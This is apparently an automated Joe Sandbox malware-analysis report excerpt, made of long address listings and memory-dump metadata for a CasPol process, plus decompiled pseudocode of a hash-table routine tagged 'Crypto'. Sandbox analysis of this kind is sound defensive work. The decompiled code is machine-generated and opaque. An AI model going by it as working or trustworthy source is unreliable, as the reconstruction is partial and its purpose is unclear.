                                                                0x016473c0
                                                                0x016473c3
                                                                0x016473c7
                                                                0x016473cc
                                                                0x016473d0
                                                                0x016473d3
                                                                0x0168f6cc
                                                                0x0168f6d4
                                                                0x0168f6d9
                                                                0x0168f6dd
                                                                0x0168f6e1
                                                                0x0168f6e5
                                                                0x0168f6f0
                                                                0x0168f6fc
                                                                0x0168f700
                                                                0x0168f709
                                                                0x0168f70e
                                                                0x0168f710
                                                                0x0168f784
                                                                0x0168f788
                                                                0x0168f78b
                                                                0x0168f78e
                                                                0x0168f790
                                                                0x0168f792
                                                                0x0168f795
                                                                0x0168f798
                                                                0x0168f7b7
                                                                0x0168f7b7
                                                                0x0168f7ba
                                                                0x0168f7ba
                                                                0x00000000
                                                                0x0168f7ba
                                                                0x0168f79a
                                                                0x0168f79d
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f79f
                                                                0x0168f7a4
                                                                0x0168f7a7
                                                                0x0168f7ab
                                                                0x0168f7ae
                                                                0x0168f7b1
                                                                0x00000000
                                                                0x0168f7b1
                                                                0x0168f712
                                                                0x0168f717
                                                                0x0168f74c
                                                                0x0168f74e
                                                                0x0168f752
                                                                0x0168f756
                                                                0x0168f75d
                                                                0x0168f761
                                                                0x0168f764
                                                                0x0168f76c
                                                                0x0168f771
                                                                0x0168f775
                                                                0x0168f778
                                                                0x0168f77c
                                                                0x00000000
                                                                0x0168f77c
                                                                0x0168f719
                                                                0x0168f71d
                                                                0x0168f720
                                                                0x0168f723
                                                                0x0168f726
                                                                0x0168f729
                                                                0x0168f72e
                                                                0x0168f740
                                                                0x0168f744
                                                                0x00000000
                                                                0x0168f744
                                                                0x0168f730
                                                                0x0168f732
                                                                0x0168f735
                                                                0x0168f738
                                                                0x00000000
                                                                0x016473d9
                                                                0x016473d9
                                                                0x016473db
                                                                0x016473de
                                                                0x016473e1
                                                                0x016473e4
                                                                0x016473e7
                                                                0x016473ea
                                                                0x016473ef
                                                                0x016473f2
                                                                0x016473f6
                                                                0x016473f9
                                                                0x016473f9
                                                                0x016473fe
                                                                0x01647401
                                                                0x01647406
                                                                0x01647409
                                                                0x00000000
                                                                0x01647409
                                                                0x00000000
                                                                0x0168f7c5
                                                                0x0168f7ca
                                                                0x0168f7cd
                                                                0x0168f7d1
                                                                0x0168f7d3
                                                                0x0168f7da
                                                                0x0168f7e0
                                                                0x0168f7e3
                                                                0x0168f7e3
                                                                0x0168f7e6
                                                                0x0168f7d5
                                                                0x0168f7d5
                                                                0x0168f7d5
                                                                0x0168f7e9
                                                                0x0168f7eb
                                                                0x0168f7f0
                                                                0x0168f7f3
                                                                0x0168f7f5
                                                                0x0168f7f8
                                                                0x0168f7fb
                                                                0x0168f7fe
                                                                0x0168f801
                                                                0x0168f80f
                                                                0x0168f814
                                                                0x0168f803
                                                                0x0168f803
                                                                0x0168f806
                                                                0x0168f806
                                                                0x00000000
                                                                0x00000000
                                                                0x0164719d
                                                                0x016471a2
                                                                0x016471a5
                                                                0x016471a9
                                                                0x016471ab
                                                                0x0168f826
                                                                0x0168f829
                                                                0x016471b1
                                                                0x016471b1
                                                                0x016471ba
                                                                0x016471ba
                                                                0x016471bf
                                                                0x016471c5
                                                                0x016471cf
                                                                0x016471d2
                                                                0x016471d8
                                                                0x016471dd
                                                                0x016471e4
                                                                0x016471e7
                                                                0x00000000
                                                                0x00000000
                                                                0x01647275
                                                                0x0164727a
                                                                0x0164727d
                                                                0x0164727f
                                                                0x01647282
                                                                0x01647284
                                                                0x0168f6a8
                                                                0x0168f6aa
                                                                0x0168f6aa
                                                                0x0164728a
                                                                0x0164728f
                                                                0x01647292
                                                                0x01647297
                                                                0x0164729a
                                                                0x0164729d
                                                                0x016472a0
                                                                0x016472a5
                                                                0x016472a9
                                                                0x016472ac
                                                                0x016472af
                                                                0x016472b2
                                                                0x016472b5
                                                                0x016472b7
                                                                0x016472ba
                                                                0x016472be
                                                                0x016472be
                                                                0x016472c2
                                                                0x016472c5
                                                                0x016472c8
                                                                0x0168f6b2
                                                                0x0168f6b2
                                                                0x00000000
                                                                0x00000000
                                                                0x01646fc5
                                                                0x01646fc5
                                                                0x01646fcc
                                                                0x01646fd8
                                                                0x01646fda
                                                                0x01646fdd
                                                                0x01646fe3
                                                                0x01647162
                                                                0x0168f845
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f84e
                                                                0x0168f8c4
                                                                0x0168f8c8
                                                                0x0168f8cb
                                                                0x0168f8ce
                                                                0x016470e0
                                                                0x016470e0
                                                                0x016470e3
                                                                0x016470e3
                                                                0x016470ea
                                                                0x016470ef
                                                                0x016470f1
                                                                0x016470f4
                                                                0x016470fc
                                                                0x016470fd
                                                                0x016470fe
                                                                0x0164710c
                                                                0x0164710c
                                                                0x0168f850
                                                                0x0168f858
                                                                0x0168f87a
                                                                0x0168f88a
                                                                0x0168f88d
                                                                0x0168f890
                                                                0x0168f893
                                                                0x0168f895
                                                                0x0168f898
                                                                0x0168f8a4
                                                                0x0168f8ad
                                                                0x0168f8b0
                                                                0x0168f8b3
                                                                0x0168f8b3
                                                                0x0168f8a4
                                                                0x01646fec
                                                                0x01646fec
                                                                0x01646fee
                                                                0x00000000
                                                                0x01646ff1
                                                                0x01646ff8
                                                                0x00000000
                                                                0x01646ffe
                                                                0x01647004
                                                                0x01647006
                                                                0x01647006
                                                                0x01647010
                                                                0x01647017
                                                                0x0164701e
                                                                0x01647072
                                                                0x01647074
                                                                0x0164707e
                                                                0x01647083
                                                                0x01647087
                                                                0x01647088
                                                                0x0164706c
                                                                0x0164706c
                                                                0x0164706d
                                                                0x00000000
                                                                0x0164706d
                                                                0x0164707c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164707c
                                                                0x01647020
                                                                0x01647023
                                                                0x016471ef
                                                                0x016471ef
                                                                0x016471f2
                                                                0x016471f7
                                                                0x00000000
                                                                0x00000000
                                                                0x016471fd
                                                                0x01647200
                                                                0x01647205
                                                                0x0164720b
                                                                0x0164720e
                                                                0x016472eb
                                                                0x00000000
                                                                0x00000000
                                                                0x016472f6
                                                                0x00000000
                                                                0x01647030
                                                                0x01647037
                                                                0x0164703e
                                                                0x01647055
                                                                0x0164705a
                                                                0x01647062
                                                                0x0168f908
                                                                0x0168f90e
                                                                0x0168f90f
                                                                0x0168f90f
                                                                0x0168f908
                                                                0x01647062
                                                                0x0164705a
                                                                0x00000000
                                                                0x01647045
                                                                0x01647045
                                                                0x01647049
                                                                0x0164704a
                                                                0x0164704d
                                                                0x0164704e
                                                                0x00000000
                                                                0x0164704e
                                                                0x0164703e
                                                                0x01647068
                                                                0x01647069
                                                                0x00000000
                                                                0x01647069
                                                                0x016472fc
                                                                0x01647301
                                                                0x01647304
                                                                0x01647314
                                                                0x01647314
                                                                0x01647319
                                                                0x00000000
                                                                0x00000000
                                                                0x01647325
                                                                0x0164732d
                                                                0x01647330
                                                                0x01647356
                                                                0x01647357
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01647332
                                                                0x01647332
                                                                0x01647337
                                                                0x00000000
                                                                0x00000000
                                                                0x01647343
                                                                0x0164734b
                                                                0x0164734e
                                                                0x01647361
                                                                0x00000000
                                                                0x00000000
                                                                0x01647367
                                                                0x01647367
                                                                0x01647368
                                                                0x00000000
                                                                0x01647368
                                                                0x01647350
                                                                0x01647351
                                                                0x01647351
                                                                0x00000000
                                                                0x01647332
                                                                0x0168f8f9
                                                                0x0168f8f9
                                                                0x0168f8fa
                                                                0x00000000
                                                                0x0168f8fa
                                                                0x01647306
                                                                0x0164730e
                                                                0x0168f8ee
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f8f4
                                                                0x00000000
                                                                0x0164730e
                                                                0x01647214
                                                                0x01647214
                                                                0x01647217
                                                                0x00000000
                                                                0x01647217
                                                                0x0164702c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164702c
                                                                0x0164708d
                                                                0x01647094
                                                                0x01647098
                                                                0x016470a0
                                                                0x0164738c
                                                                0x0164738d
                                                                0x0164738d
                                                                0x016470a0
                                                                0x01647098
                                                                0x016470a6
                                                                0x016470ab
                                                                0x016470b3
                                                                0x016470b5
                                                                0x016470cd
                                                                0x016470cd
                                                                0x016470d0
                                                                0x016470d8
                                                                0x0164711a
                                                                0x0164711c
                                                                0x0164711c
                                                                0x01647121
                                                                0x00000000
                                                                0x00000000
                                                                0x01647129
                                                                0x00000000
                                                                0x00000000
                                                                0x0164712b
                                                                0x0164712b
                                                                0x01647130
                                                                0x0164737e
                                                                0x01647381
                                                                0x00000000
                                                                0x01647381
                                                                0x01647138
                                                                0x00000000
                                                                0x00000000
                                                                0x01647144
                                                                0x01647144
                                                                0x016470da
                                                                0x016470da
                                                                0x016470dd
                                                                0x00000000
                                                                0x016470dd
                                                                0x016470b7
                                                                0x016470b8
                                                                0x016470bb
                                                                0x016470c2
                                                                0x00000000
                                                                0x00000000
                                                                0x016470c7
                                                                0x00000000
                                                                0x00000000
                                                                0x016470c9
                                                                0x016470ca
                                                                0x00000000
                                                                0x016470ad
                                                                0x016470ad
                                                                0x016470af
                                                                0x00000000
                                                                0x016470af
                                                                0x01647148
                                                                0x0164714d
                                                                0x0168f8e2
                                                                0x0168f8e2
                                                                0x01647153
                                                                0x01647154
                                                                0x01647157
                                                                0x00000000
                                                                0x01647157
                                                                0x0168f87c
                                                                0x0168f87f
                                                                0x0168f882
                                                                0x00000000
                                                                0x0168f882
                                                                0x0168f85e
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f864
                                                                0x0168f869
                                                                0x0168f86c
                                                                0x00000000
                                                                0x0168f86c
                                                                0x01647168
                                                                0x01647170
                                                                0x0168f8d6
                                                                0x0168f8d6
                                                                0x01647176
                                                                0x01647179
                                                                0x00000000
                                                                0x01647179
                                                                0x01646fe9
                                                                0x01646fe9
                                                                0x00000000
                                                                0x01646fe9
                                                                0x01646fbf
                                                                0x01646f8c
                                                                0x01646f93
                                                                0x016472d6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016472d6
                                                                0x01646f99
                                                                0x01646f99
                                                                0x01646f99
                                                                0x00000000
                                                                0x01646f68
                                                                0x01646f50
                                                                0x01646f56
                                                                0x0164722c
                                                                0x0168f629
                                                                0x0168f629
                                                                0x00000000
                                                                0x0168f629
                                                                0x01647232
                                                                0x01647239
                                                                0x0168f623
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f623
                                                                0x0164723f
                                                                0x01647242
                                                                0x0168f64e
                                                                0x0168f64e
                                                                0x00000000
                                                                0x0168f64e
                                                                0x01647248
                                                                0x0164724f
                                                                0x01647373
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01647379
                                                                0x01647255
                                                                0x01647258
                                                                0x0168f63c
                                                                0x0168f648
                                                                0x00000000
                                                                0x0168f648
                                                                0x0164725e
                                                                0x01647265
                                                                0x0168f636
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0168f636
                                                                0x0164726b
                                                                0x0164726b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01646f56
                                                                0x01646f3d
                                                                0x01646ed2
                                                                0x00000000
                                                                0x01646ec4

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e738671c5ef7fcd5ebd0a6b5867a2fcaf65d7fd1ffee8352ed83ac8e28927476
                                                                • Instruction ID: 6f4b6713f01dc51cdab426d032fdeb4a0e668bde5816e3de7e723df2c140fcd4
                                                                • Opcode Fuzzy Hash: e738671c5ef7fcd5ebd0a6b5867a2fcaf65d7fd1ffee8352ed83ac8e28927476
                                                                • Instruction Fuzzy Hash: FE029EB4D15215CBDB28DF9CC8806BDBBB2EF45700F65812EE916EB351E7709886CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016FDFCE Relevance: .5, Instructions: 458COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E016FDFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x171d360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E0166B640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x1718680
							_v48 = _t15;
							L0164FAD0(_t15);
							_t17 = _t269 + 0xc; // 0x1718674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E0164FA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E016FE62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E01642280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E0163FFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E0165F3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x171b1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E0163FFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E016FE5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x171b1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E016FE7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E016FEE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E016FE7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E0164FA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E016FEE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}
































































                                                                0x016fdfce
                                                                0x016fdfdd
                                                                0x016fdfe1
                                                                0x016fdfe3
                                                                0x016fdfea
                                                                0x016fe49c
                                                                0x016fe49c
                                                                0x016fe49e
                                                                0x016fe4b0
                                                                0x016fe4b0
                                                                0x016fdff0
                                                                0x016fdff5
                                                                0x00000000
                                                                0x016fe003
                                                                0x016fe003
                                                                0x016fe006
                                                                0x016fe00b
                                                                0x016fe00e
                                                                0x016fe014
                                                                0x016fe07d
                                                                0x016fe07d
                                                                0x016fe080
                                                                0x016fe0d6
                                                                0x016fe0dc
                                                                0x016fe0de
                                                                0x016fe0de
                                                                0x016fe0e2
                                                                0x016fe0e5
                                                                0x016fe0ea
                                                                0x016fe0ea
                                                                0x016fe0ed
                                                                0x016fe0ef
                                                                0x016fe0f2
                                                                0x016fe0f4
                                                                0x016fe0f4
                                                                0x016fe0f4
                                                                0x016fe0f4
                                                                0x016fe0f9
                                                                0x016fe100
                                                                0x016fe105
                                                                0x016fe108
                                                                0x016fe10b
                                                                0x016fe10f
                                                                0x016fe112
                                                                0x016fe116
                                                                0x016fe119
                                                                0x016fe11d
                                                                0x016fe122
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe124
                                                                0x016fe127
                                                                0x016fe12c
                                                                0x016fe197
                                                                0x016fe199
                                                                0x016fe19b
                                                                0x016fe1b8
                                                                0x016fe1b8
                                                                0x016fe1bc
                                                                0x016fe1c4
                                                                0x016fe1c8
                                                                0x016fe1cd
                                                                0x016fe1d2
                                                                0x016fe1dc
                                                                0x016fe1e1
                                                                0x016fe1e3
                                                                0x016fe1e3
                                                                0x016fe1e6
                                                                0x016fe1ea
                                                                0x016fe1f2
                                                                0x016fe1f8
                                                                0x016fe1fa
                                                                0x016fe1fd
                                                                0x016fe201
                                                                0x016fe204
                                                                0x016fe208
                                                                0x016fe20b
                                                                0x016fe20f
                                                                0x016fe214
                                                                0x016fe258
                                                                0x016fe258
                                                                0x016fe258
                                                                0x016fe25d
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe267
                                                                0x016fe26d
                                                                0x016fe26f
                                                                0x016fe2a3
                                                                0x016fe2a3
                                                                0x016fe2a6
                                                                0x016fe2ac
                                                                0x016fe2b5
                                                                0x016fe2ba
                                                                0x016fe2bd
                                                                0x016fe2c5
                                                                0x016fe418
                                                                0x016fe418
                                                                0x016fe451
                                                                0x016fe45e
                                                                0x016fe460
                                                                0x016fe463
                                                                0x016fe469
                                                                0x016fe46b
                                                                0x016fe46e
                                                                0x016fe470
                                                                0x00000000
                                                                0x016fe470
                                                                0x016fe2cd
                                                                0x016fe2dc
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe2e2
                                                                0x016fe2e8
                                                                0x016fe2ec
                                                                0x016fe2ec
                                                                0x016fe2fb
                                                                0x016fe303
                                                                0x016fe305
                                                                0x016fe30a
                                                                0x016fe47d
                                                                0x016fe483
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe485
                                                                0x016fe485
                                                                0x016fe487
                                                                0x016fe48a
                                                                0x016fe48f
                                                                0x016fe495
                                                                0x00000000
                                                                0x016fe310
                                                                0x016fe310
                                                                0x016fe310
                                                                0x016fe315
                                                                0x016fe328
                                                                0x016fe32f
                                                                0x016fe331
                                                                0x016fe331
                                                                0x016fe336
                                                                0x016fe340
                                                                0x016fe34b
                                                                0x016fe34f
                                                                0x016fe351
                                                                0x016fe35f
                                                                0x016fe35f
                                                                0x016fe374
                                                                0x016fe377
                                                                0x016fe3e6
                                                                0x016fe3e9
                                                                0x016fe3f5
                                                                0x016fe3f7
                                                                0x016fe3fa
                                                                0x016fe3ff
                                                                0x016fe40a
                                                                0x016fe410
                                                                0x016fe415
                                                                0x016fe415
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe379
                                                                0x016fe379
                                                                0x016fe379
                                                                0x016fe37c
                                                                0x016fe37f
                                                                0x016fe37f
                                                                0x016fe382
                                                                0x016fe388
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe38c
                                                                0x016fe3b6
                                                                0x016fe3c1
                                                                0x016fe3c6
                                                                0x016fe3c8
                                                                0x016fe3ce
                                                                0x016fe3d0
                                                                0x016fe3d3
                                                                0x016fe3d3
                                                                0x016fe3d8
                                                                0x016fe3d8
                                                                0x016fe3db
                                                                0x016fe3e2
                                                                0x00000000
                                                                0x016fe353
                                                                0x016fe353
                                                                0x016fe355
                                                                0x016fe355
                                                                0x016fe356
                                                                0x016fe358
                                                                0x016fe35b
                                                                0x00000000
                                                                0x016fe355
                                                                0x016fe351
                                                                0x016fe317
                                                                0x016fe31c
                                                                0x016fe323
                                                                0x016fe326
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe31e
                                                                0x016fe31e
                                                                0x016fe31e
                                                                0x016fe31f
                                                                0x016fe31f
                                                                0x00000000
                                                                0x016fe31e
                                                                0x016fe30a
                                                                0x00000000
                                                                0x016fe26f
                                                                0x016fe269
                                                                0x016fe26b
                                                                0x00000000
                                                                0x016fe26b
                                                                0x016fe216
                                                                0x016fe219
                                                                0x016fe21e
                                                                0x016fe29f
                                                                0x016fe286
                                                                0x016fe288
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe28a
                                                                0x016fe294
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe29a
                                                                0x016fe252
                                                                0x016fe255
                                                                0x00000000
                                                                0x016fe271
                                                                0x016fe27b
                                                                0x016fe283
                                                                0x00000000
                                                                0x016fe283
                                                                0x016fe1d4
                                                                0x016fe1d4
                                                                0x00000000
                                                                0x016fe1d4
                                                                0x016fe19d
                                                                0x016fe19d
                                                                0x016fe1a7
                                                                0x016fe1a9
                                                                0x016fe1a9
                                                                0x016fe1ae
